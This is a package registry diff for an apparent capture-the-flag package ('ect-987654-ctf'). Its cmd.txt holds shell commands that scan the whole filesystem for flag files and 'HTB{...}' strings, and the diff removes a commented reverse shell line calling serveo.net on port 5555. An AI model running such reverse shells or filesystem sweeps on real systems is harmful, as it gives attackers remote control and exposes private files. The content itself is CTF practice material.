ect-987654-ctf 0.0.12 → 0.1.11
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/cmd.txt +0 -8
- package/evil.yaml +2 -2
- package/last_post.json +1 -3
- package/package.json +1 -1
package/cmd.txt
CHANGED
|
@@ -8,11 +8,3 @@ tar -tzf /home/node/aspect-node.tar.gz | head -n 200 || echo "tar list failed"
|
|
|
8
8
|
find /home/node -maxdepth 4 -type f -iname "*flag*" -o -iname "flag.txt" -print 2>/dev/null || true
|
|
9
9
|
find / -maxdepth 4 -type f -iname "*flag*" -o -iname "flag.txt" -print 2>/dev/null | head -n 200
|
|
10
10
|
# if you find promising files, cat them (you can add new lines like: cat /path/to/thatfile)
|
|
11
|
-
#bash -c 'bash -i >& /dev/tcp/serveo.net/5555 0>&1'
|
|
12
|
-
find / -type f -exec strings {} + 2>/dev/null | grep -Eo "HTB\{[^}]+\}" | head -n 50
|
|
13
|
-
grep -R --text --color=never -Eo "HTB\{[^}]+\}" / 2>/dev/null | head -n 100
|
|
14
|
-
# kalau tak jumpa, cuba dalam /home
|
|
15
|
-
grep -R --text --color=never -Eo "HTB\{[^}]+\}" /home 2>/dev/null | head -n 100
|
|
16
|
-
# kalau tak jumpa jugak, cuba dalam /opt
|
|
17
|
-
grep -R --text --color=never -Eo "HTB\{[^}]+\}" /opt 2>/dev/null | head -n 100
|
|
18
|
-
|
package/evil.yaml
CHANGED
package/last_post.json
CHANGED